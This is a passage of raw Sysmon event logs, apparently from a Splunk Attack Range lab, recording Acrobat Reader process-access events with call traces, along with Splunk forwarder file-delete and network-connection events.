DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.667{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.635{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BBCDF8FF10CE5FD81F0BE377D87528A,SHA256=7B55C8683BBB28917C5AE6FE612B2DAF63ADD92A7B7027C705303F680E12A42A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.620{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.620{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000018784Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:24.970{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50195-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000047601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.561{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.559{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.518{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.486{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.439{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.439{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.393{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.393{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.346{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.346{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.283{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.283{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=638E2DD1FEAE6CB574B701C3BDC3096B,SHA256=2FF6DEDBE0D133463FF4A0F428246681400FD7B44AD6FAF064570F0D42BC6BCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:27.283{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 